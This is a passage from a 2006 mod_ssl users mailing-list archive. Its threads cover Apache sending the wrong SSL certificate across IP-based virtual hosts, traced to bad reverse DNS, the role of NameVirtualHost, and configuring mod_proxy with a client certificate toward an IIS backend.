References: <44775B47.3080703@sakrina.com> <44784D0C.7000308@sakrina.com> <4478A8C0.5090008@sakrina.com>
In-Reply-To: <4478A8C0.5090008@sakrina.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Markus 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

oops found it.. rewrite in .htaccess :)
forgot to ad https :)

Markus wrote:

> Okay got everthing working. Except images.
>
> On any page what uses images they dont show.
> They show perfect in http but not in https.
>
> the call is: https://xxx/image.gif
>
> if I paste the image into the browser direct it shows, but not via the 
> page? any hint ?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May 29 18:15:31 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5E62014D8A1; Mon, 29 May 2006 18:15:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-vbr17.xs4all.nl (smtp-vbr17.xs4all.nl [194.109.24.37])
	by master.modssl.org (Postfix) with ESMTP id 074A314D838
	for ; Mon, 29 May 2006 18:15:30 +0200 (CEST)
Received: from [192.168.1.15] (waxtrapp.xs4all.nl [80.127.29.36])
	(authenticated bits=0)
	by smtp-vbr17.xs4all.nl (8.13.6/8.13.6) with ESMTP id k4TGFNkA006693;
	Mon, 29 May 2006 18:15:28 +0200 (CEST)
	(envelope-from frank.van.beek@waxtrapp.com)
Message-ID: <447B1E17.70307@waxtrapp.com>
Date: Mon, 29 May 2006 18:15:19 +0200
From: Frank van Beek 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache sends wrong certificate
References: <4474A36A.6070203@waxtrapp.com>
In-Reply-To: <4474A36A.6070203@waxtrapp.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by XS4ALL Virus Scanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Frank van Beek 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

Frank van Beek wrote:

> Hi all,
> 
> This morning we migrated 4 of our websites to a new server. Each of 
> these websites uses a certificate for https connections. We've got only 
> one Apache instance running with 4 virtual hosts on 4 different 
> IP-addresses.

Today we discovered the cause of our problems. Our new hosting provider 
had invalid reverse DNS records:

---------
% dig -x xxx.xxx.198.61

<-- snip -->
;; ANSWER SECTION:
61.198.xxx.xxx.in-addr.arpa. 900 IN     PTR     .
<-- snip -->

---------

After they changed their DNS, all we had to do was restart Apache to 
make it function correctly.

With many thanks to ssh on Mac OS X which reported: Nasty PTR record "" 
is set up for xxx.xxx.198.61, ignoring.

That's what gave us a clue that it might be reverse DNS related.

Frank.
-- 
Frank van Beek

WAXTRAPP BV
van Diemenstraat 366
1013CR Amsterdam
The Netherlands

Phone:  +31 (0)20 672 2308
Fax:    +31 (0)20 672 2488

http://www.waxtrapp.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 30 01:56:19 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3178214D868; Tue, 30 May 2006 01:56:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id B7F9E14D82B
	for ; Tue, 30 May 2006 01:56:18 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.13.6/8.12.11) with ESMTP id k4U01Qe5001671;
	Mon, 29 May 2006 20:01:26 -0400
Date: Mon, 29 May 2006 20:01:22 -0400 (EDT)
From: "R. DuFresne" 
To: Frank van Beek 
cc: modssl-users@modssl.org, Louis Nagtegaal ,
        Bas Groot ,
        Bas van Eck 
Subject: Re: Apache sends wrong certificate
In-Reply-To: <4474A36A.6070203@waxtrapp.com>
Message-ID: 
References: <4474A36A.6070203@waxtrapp.com>
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



I'm sure this has been answered, but in case it has not;

You can not virtualize https to more then one hostsite, you have to have 
real IP addresses for https.

Thanks,

Ron DuFresne

On Wed, 24 May 2006, Frank van Beek wrote:

> Hi all,
>
> This morning we migrated 4 of our websites to a new server. Each of these 
> websites uses a certificate for https connections. We've got only one Apache 
> instance running with 4 virtual hosts on 4 different IP-addresses.
>
> This worked fine on the old server. But since the move this morning Apache 
> sends the certificate for the first VirtualHost to all 4 IP-addresses. Two of 
> these sites need an additional SSLCertificateChainFile, and this file is send 
> *correctly* depending on the IP-address. So Apache does see 4 different 
> VirtualHosts, but somehow ignores the individual SSLCertificateFiles.
>
> Here is the relevant part of httpd.conf for these 4 hosts:
>
> -----
>    Listen xxx.xxx.198.62:443
>    NameVirtualHost xxx.xxx.198.62:443
>
>    
>        SSLEngine On
>        SSLCertificateChainFile      chain1
>        SSLCertificateFile           crt1
>        SSLCertificateKeyFile        key1
>    
>
>    Listen xxx.xxx.198.61:443
>    NameVirtualHost xxx.xxx.198.61:443
>
>    
>        SSLEngine On
>        SSLCertificateChainFile      chain2
>        SSLCertificateFile           crt2
>        SSLCertificateKeyFile        key2
>    
>
>    Listen xxx.xxx.198.63:443
>    NameVirtualHost xxx.xxx.198.63:443
>
>    
>        SSLEngine On
>        SSLCertificateFile           crt3
>        SSLCertificateKeyFile        key3
>    
>
>    Listen xxx.xxx.198.64:443
>    NameVirtualHost xxx.xxx.198.64:443
>
>    
>        SSLEngine On
>        SSLCertificateFile           crt4
>        SSLCertificateKeyFile        key4
>    
> -----
>
> The old server is still up and running. I've upgraded Apache on that system 
> to the same version (2.0.58) and copied httpd.conf to that machine. The above 
> configuration somehow works correctly there.
>
> I've been trying to debug this using "openssl s_client -state -connect" and I 
> do see some relevant differences, but I've been unable to interpret them.
>
> I know this report lacks a lot of possibly relevant details. But I didn't 
> want to send the whole httpd.conf and all of the terminal output to this 
> list.
>
> Is there an obvious mistake in my configuration? Or have I stumbled on a bug 
> in Apache 2.0.58?
>
> Met groet,
>
> Frank.
>

- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEe4tVst+vzJSwZikRAq+sAJ4mHff+nYpHLXBgfoQdFIYVBMRhYgCgw29G
ZcxkcdgHNKCofvRN3Hc5miA=
=BwdU
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 30 10:36:15 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9E31B14D868; Tue, 30 May 2006 10:36:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-vbr5.xs4all.nl (smtp-vbr5.xs4all.nl [194.109.24.25])
	by master.modssl.org (Postfix) with ESMTP id 35D3314D82B
	for ; Tue, 30 May 2006 10:36:14 +0200 (CEST)
Received: from [192.168.1.15] (waxtrapp.xs4all.nl [80.127.29.36])
	(authenticated bits=0)
	by smtp-vbr5.xs4all.nl (8.13.6/8.13.6) with ESMTP id k4U8aC62026559;
	Tue, 30 May 2006 10:36:13 +0200 (CEST)
	(envelope-from frank.van.beek@waxtrapp.com)
Message-ID: <447C03F9.8010804@waxtrapp.com>
Date: Tue, 30 May 2006 10:36:09 +0200
From: Frank van Beek 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache sends wrong certificate
References: <4474A36A.6070203@waxtrapp.com> 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by XS4ALL Virus Scanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Frank van Beek 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Ron,

R. DuFresne wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> I'm sure this has been answered, but in case it has not;
> 
> You can not virtualize https to more then one hostsite, you have to have 
> real IP addresses for https.

Thanks for your reply.

I understand your confusion. In my post I masked out the first two 
numbers of the IP-addresses.

But we do have 4 VirtualHosts on 4 different IP-addresses. As it turned 
out (see a previous post), our problem was caused by a misconfigured 
reverse DNS.

Frank.

WAXTRAPP BV
van Diemenstraat 366
1013CR Amsterdam
The Netherlands

Phone:  +31 (0)20 672 2308
Fax:    +31 (0)20 672 2488

http://www.waxtrapp.com

> Thanks,
> 
> Ron DuFresne
> 
> On Wed, 24 May 2006, Frank van Beek wrote:
> 
>> Hi all,
>>
>> This morning we migrated 4 of our websites to a new server. Each of 
>> these websites uses a certificate for https connections. We've got 
>> only one Apache instance running with 4 virtual hosts on 4 different 
>> IP-addresses.
>>
>> This worked fine on the old server. But since the move this morning 
>> Apache sends the certificate for the first VirtualHost to all 4 
>> IP-addresses. Two of these sites need an additional 
>> SSLCertificateChainFile, and this file is send *correctly* depending 
>> on the IP-address. So Apache does see 4 different VirtualHosts, but 
>> somehow ignores the individual SSLCertificateFiles.
>>
>> Here is the relevant part of httpd.conf for these 4 hosts:
>>
>> -----
>>    Listen xxx.xxx.198.62:443
>>    NameVirtualHost xxx.xxx.198.62:443
>>
>>    
>>        SSLEngine On
>>        SSLCertificateChainFile      chain1
>>        SSLCertificateFile           crt1
>>        SSLCertificateKeyFile        key1
>>    
>>
>>    Listen xxx.xxx.198.61:443
>>    NameVirtualHost xxx.xxx.198.61:443
>>
>>    
>>        SSLEngine On
>>        SSLCertificateChainFile      chain2
>>        SSLCertificateFile           crt2
>>        SSLCertificateKeyFile        key2
>>    
>>
>>    Listen xxx.xxx.198.63:443
>>    NameVirtualHost xxx.xxx.198.63:443
>>
>>    
>>        SSLEngine On
>>        SSLCertificateFile           crt3
>>        SSLCertificateKeyFile        key3
>>    
>>
>>    Listen xxx.xxx.198.64:443
>>    NameVirtualHost xxx.xxx.198.64:443
>>
>>    
>>        SSLEngine On
>>        SSLCertificateFile           crt4
>>        SSLCertificateKeyFile        key4
>>    
>> -----
>>
>> The old server is still up and running. I've upgraded Apache on that 
>> system to the same version (2.0.58) and copied httpd.conf to that 
>> machine. The above configuration somehow works correctly there.
>>
>> I've been trying to debug this using "openssl s_client -state 
>> -connect" and I do see some relevant differences, but I've been unable 
>> to interpret them.
>>
>> I know this report lacks a lot of possibly relevant details. But I 
>> didn't want to send the whole httpd.conf and all of the terminal 
>> output to this list.
>>
>> Is there an obvious mistake in my configuration? Or have I stumbled on 
>> a bug in Apache 2.0.58?
>>
>> Met groet,
>>
>> Frank.
>>
> 
> - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
> Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629
> 
> ...We waste time looking for the perfect lover
> instead of creating the perfect love.
> 
>                 -Tom Robbins 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2.2 (GNU/Linux)
> 
> iD8DBQFEe4tVst+vzJSwZikRAq+sAJ4mHff+nYpHLXBgfoQdFIYVBMRhYgCgw29G
> ZcxkcdgHNKCofvRN3Hc5miA=
> =BwdU
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 30 13:50:49 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4273414D87F; Tue, 30 May 2006 13:50:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.172])
	by master.modssl.org (Postfix) with ESMTP id F182914D82B
	for ; Tue, 30 May 2006 13:50:48 +0200 (CEST)
Received: by ug-out-1314.google.com with SMTP id s2so70812uge
        for ; Tue, 30 May 2006 04:50:46 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth;
        b=tKBcmRZxWHFym7SoRNeFtHAAOKDBF20o7cOFWhHyx35SdHj7ES4uBEqxsPznN1/kviS7QNa3TTfPEnVc+suoNSLa83BHsR4LOd80EiOmm/D6+MkKfzb+CbebWKUfqOnQIe5PppcWqI2GnQg/3XkgQK58AAqBzjHRpVpPvZ6QeVg=
Received: by 10.67.89.6 with SMTP id r6mr2695227ugl;
        Tue, 30 May 2006 04:44:08 -0700 (PDT)
Received: by 10.66.245.19 with HTTP; Tue, 30 May 2006 04:44:08 -0700 (PDT)
Message-ID: 
Date: Tue, 30 May 2006 07:44:08 -0400
From: "Cliff Woolley" 
To: modssl-users@modssl.org
Subject: Re: Apache sends wrong certificate
In-Reply-To: <447C03F9.8010804@waxtrapp.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_8757_616293.1148989448198"
References: <4474A36A.6070203@waxtrapp.com>
	 
	 <447C03F9.8010804@waxtrapp.com>
X-Google-Sender-Auth: 894f07753cf94678
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cliff Woolley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_8757_616293.1148989448198
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

On 5/30/06, Frank van Beek  wrote:
>
> I understand your confusion. In my post I masked out the first two
> numbers of the IP-addresses.
> But we do have 4 VirtualHosts on 4 different IP-addresses. As it turned
> out (see a previous post), our problem was caused by a misconfigured
> reverse DNS.



I'm glad you figured it out, but it's still a little bit unclear to me why
the DNS should have had any effect.

The NameVirtualHost directives in the config snippet you posted are
extraneous and should be removed.  I wonder if you'd gotten rid of those if
the problem would have gone away regardless of DNS.

Hmm...

--Cliff

------=_Part_8757_616293.1148989448198
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


On 5/30/06, Frank van Beek <frank.van.beek@waxtrapp.com> wrote:

I understand your confusion. In my post I masked out the first two
numbers of the IP-addresses.
But we do have 4 VirtualHosts on 4 different IP-addresses. As it turned
out (see a previous post), our problem was caused by a misconfigured

reverse DNS.



I'm glad you figured it out, but it's still a little bit unclear to me why the DNS should have had any effect.



The NameVirtualHost directives in the config snippet you posted are
extraneous and should be removed.  I wonder if you'd gotten rid of
those if the problem would have gone away regardless of DNS.



Hmm...



--Cliff


 



------=_Part_8757_616293.1148989448198--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 30 21:15:04 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D8A8714D89C; Tue, 30 May 2006 21:15:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from olive.qinip.net (olive.qinip.net [62.100.30.40])
	by master.modssl.org (Postfix) with ESMTP id 639C114D82B
	for ; Tue, 30 May 2006 21:15:02 +0200 (CEST)
Received: from [10.0.0.1] (h8441232237.dsl.speedlinq.nl [84.41.232.237])
	by olive.qinip.net (Postfix) with ESMTP id 96E0F180F6;
	Tue, 30 May 2006 21:15:01 +0200 (MEST)
Message-ID: <447C99B2.3060400@waxtrapp.com>
Date: Tue, 30 May 2006 21:14:58 +0200
From: Frank van Beek 
User-Agent: Mozilla Thunderbird 0.8 (Windows/20040913)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache sends wrong certificate
References: <4474A36A.6070203@waxtrapp.com>	 	 <447C03F9.8010804@waxtrapp.com> 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Frank van Beek 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hey Cliff,

Cliff Woolley wrote:
> 
> On 5/30/06, *Frank van Beek* wrote:
> 
>     I understand your confusion. In my post I masked out the first two
>     numbers of the IP-addresses.
>     But we do have 4 VirtualHosts on 4 different IP-addresses. As it turned
>     out (see a previous post), our problem was caused by a misconfigured
>     reverse DNS.
> 
> 
> 
> I'm glad you figured it out, but it's still a little bit unclear to me 
> why the DNS should have had any effect.
> 
> The NameVirtualHost directives in the config snippet you posted are 
> extraneous and should be removed.  I wonder if you'd gotten rid of those 
> if the problem would have gone away regardless of DNS.

I checked a couple of pages on VirtualHosts in the Apache documentation. 
As far as I can see in the examples in most of them there a 
NameVirtualHost for every VirtualHost, even when it's running on a 
different port.

See the examples here:

   http://httpd.apache.org/docs/2.0/vhosts/examples.html

I don't know enough about Apache configuration to know when you need 
both, so could you please explain me why in our configuration the 
NameVirtualHost directives are extraneous?


Met groet,

Frank.
-- 
Frank van Beek

WAXTRAPP BV
van Diemenstraat 366
1013CR Amsterdam
The Netherlands

Phone:  +31 (0)20 672 2308
Fax:    +31 (0)20 672 2488

http://www.waxtrapp.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 31 01:31:01 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B2A3814D88C; Wed, 31 May 2006 01:31:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.186])
	by master.modssl.org (Postfix) with ESMTP id 5551614D838
	for ; Wed, 31 May 2006 01:30:58 +0200 (CEST)
Received: by nf-out-0910.google.com with SMTP id l37so50045nfc
        for ; Tue, 30 May 2006 16:30:57 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth;
        b=C/4x9HJiBoa+9NxjdUkDwiItlC2YnX32k/mjmQgV9d48veS+++RomPxWtxVR2ejlC+kZlUVFrx9n6eIjDsGfrPz7n2EVTTb+5A0wJdpd0xKwNSLwg6ffgS7scL8OF4wbUzGKZRXicYAdkonQ+A3qsfqcVSLYozn4bYPK5kxHC9Q=
Received: by 10.49.88.4 with SMTP id q4mr86903nfl;
        Tue, 30 May 2006 14:53:14 -0700 (PDT)
Received: by 10.66.245.19 with HTTP; Tue, 30 May 2006 14:53:14 -0700 (PDT)
Message-ID: 
Date: Tue, 30 May 2006 17:53:14 -0400
From: "Cliff Woolley" 
To: modssl-users@modssl.org
Subject: Re: Apache sends wrong certificate
In-Reply-To: <447C99B2.3060400@waxtrapp.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_20752_25328990.1149025994429"
References: <4474A36A.6070203@waxtrapp.com>
	 
	 <447C03F9.8010804@waxtrapp.com>
	 
	 <447C99B2.3060400@waxtrapp.com>
X-Google-Sender-Auth: 93a5c57386e45ee6
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cliff Woolley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_20752_25328990.1149025994429
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

On 5/30/06, Frank van Beek  wrote:
>
> I checked a couple of pages on VirtualHosts in the Apache documentation.
> As far as I can see in the examples in most of them there a
> NameVirtualHost for every VirtualHost, even when it's running on a
> different port.
>
> See the examples here:
>
>    http://httpd.apache.org/docs/2.0/vhosts/examples.html
>

All of the examples on that page that use NameVirtualHost are actually
*doing* name-based virtual hosting, which is where you have multiple virtual
hosts with the same IP/port combination (thus the only thing that
distinguishes them is their name, as given in the Host: HTTP header).

You're doing IP-based virtual hosting, not named-based virtual hosting.
(You only have one virtual host per IP/port combination.)  Thus you don't
need NameVirtualHost.  If you scroll down in the page you gave, you'll see
an example of IP-based virtual hosting, and note that it does *not* include
any NameVirtualHost directives.

Hope this helps,
--Cliff

------=_Part_20752_25328990.1149025994429
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline



On 5/30/06, Frank van Beek <frank.van.beek@waxtrapp.com> wrote:

I checked a couple of pages on VirtualHosts in the Apache documentation.
As far as I can see in the examples in most of them there a
NameVirtualHost for every VirtualHost, even when it's running on a
different port.


See the examples here:

   http://httpd.apache.org/docs/2.0/vhosts/examples.html

All of the examples on that page that use NameVirtualHost are actually *doing* name-based virtual hosting, which is where you have multiple virtual hosts with the same IP/port combination (thus the only thing that distinguishes them is their name, as given in the Host: HTTP header).


You're doing IP-based virtual hosting, not named-based virtual hosting.  (You only have one virtual host per IP/port combination.)  Thus you don't need NameVirtualHost.  If you scroll down in the page you gave, you'll see an example of IP-based virtual hosting, and note that it does *not* include any NameVirtualHost directives.


Hope this helps,
--Cliff


------=_Part_20752_25328990.1149025994429--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 31 10:56:44 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 158AB14D8A2; Wed, 31 May 2006 10:56:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-vbr10.xs4all.nl (smtp-vbr10.xs4all.nl [194.109.24.30])
	by master.modssl.org (Postfix) with ESMTP id CA70D14D838
	for ; Wed, 31 May 2006 10:56:43 +0200 (CEST)
Received: from [192.168.1.15] (waxtrapp.xs4all.nl [80.127.29.36])
	(authenticated bits=0)
	by smtp-vbr10.xs4all.nl (8.13.6/8.13.6) with ESMTP id k4V8ufk7036550
	for ; Wed, 31 May 2006 10:56:41 +0200 (CEST)
	(envelope-from frank.van.beek@waxtrapp.com)
Message-ID: <447D5A45.7050307@waxtrapp.com>
Date: Wed, 31 May 2006 10:56:37 +0200
From: Frank van Beek 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache sends wrong certificate
References: <4474A36A.6070203@waxtrapp.com>	 	 <447C03F9.8010804@waxtrapp.com>	 	 <447C99B2.3060400@waxtrapp.com> 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by XS4ALL Virus Scanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Frank van Beek 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Cliff,

Cliff Woolley wrote:

> You're doing IP-based virtual hosting, not named-based virtual hosting.  
> (You only have one virtual host per IP/port combination.)  Thus you 
> don't need NameVirtualHost.  If you scroll down in the page you gave, 
> you'll see an example of IP-based virtual hosting, and note that it does 
> *not* include any NameVirtualHost directives.
> 
> Hope this helps,

Thanks for the explanation. I *think* I understand the difference now. :)

The next time we add a new IP-address I'll check if Apache ignores 
invalid DNS PTR records if I remove the NameVirtualHost. This might take 
a while though before this happens.

I'll report my findings back to this list for documentation purposes.


Met groet,

Frank.
-- 
Frank van Beek

WAXTRAPP BV
van Diemenstraat 366
1013CR Amsterdam
The Netherlands

Phone:  +31 (0)20 672 2308
Fax:    +31 (0)20 672 2488

http://www.waxtrapp.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  6 21:39:28 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BAD1514D869; Tue,  6 Jun 2006 21:39:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from compuwar.net (compuwar.net [209.50.252.247])
	by master.modssl.org (Postfix) with ESMTP id 47F1314D84F
	for ; Tue,  6 Jun 2006 21:39:28 +0200 (CEST)
Received: by compuwar.net (Postfix, from userid 500)
	id 88D376A416B; Tue,  6 Jun 2006 15:36:37 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1])
	by compuwar.net (Postfix) with ESMTP id 85FE138C002
	for ; Tue,  6 Jun 2006 15:36:37 -0400 (EDT)
Date: Tue, 6 Jun 2006 15:36:37 -0400 (EDT)
From: "Paul D. Robertson" 
X-X-Sender: paul@bat.clueby4.org
To: modssl-users@modssl.org
Subject: Mod_proxy and client certificate auth
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul D. Robertson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi,

I'm trying to get mod_proxy to work as an SSL proxy using a client 
certificate on the proxy to connect to a backend IIS server that's set up 
to use any client certificate signed by my OpenSSL-based CA.  

If I use a browser with the same certificate bundled up as a PKCS12 
bundle, through the proxy, it all works, but what I really need is for 
Apache/mod_ssl to use a locally stored version of the cert/key to connect, 
then let the IIS server do its normal basic auth.  That's one single 
client cert/key for all externally connecting users (yes, I understand 
the ramifaction- it's not for user authentication,) not a per-user proxy 
cert.

Here's what I have in my Apache ssl.conf file:

RequestHeader set Front-End-Https "On"
CacheDisable *
SSLProxyEngine On
ProxyPass /app https://iisserver/app
ProxyPassReverse /app https://iisserver/app
SSLProxyMachineCertificatePath conf/cert
SSLEngine on

conf/cert contains user.pem, a .pem cert file with an RSA private key 
catenated to it.  I also have a hash link to the user.pem cert file.

Just in case, I've also added "export OPENSSL_ALLOW_PROXY_CERTS=1" to 
bin/envvars.

Can anyone tell me what I'm doing wrong?

Thanks,

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
paul@compuwar.net       which may have no basis whatsoever in fact."

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  7 20:50:32 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7B0D614D88C; Wed,  7 Jun 2006 20:50:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.198])
	by master.modssl.org (Postfix) with ESMTP id C52D714D864
	for ; Wed,  7 Jun 2006 20:50:29 +0200 (CEST)
Received: by nz-out-0102.google.com with SMTP id 12so210436nzp
        for ; Wed, 07 Jun 2006 11:50:25 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
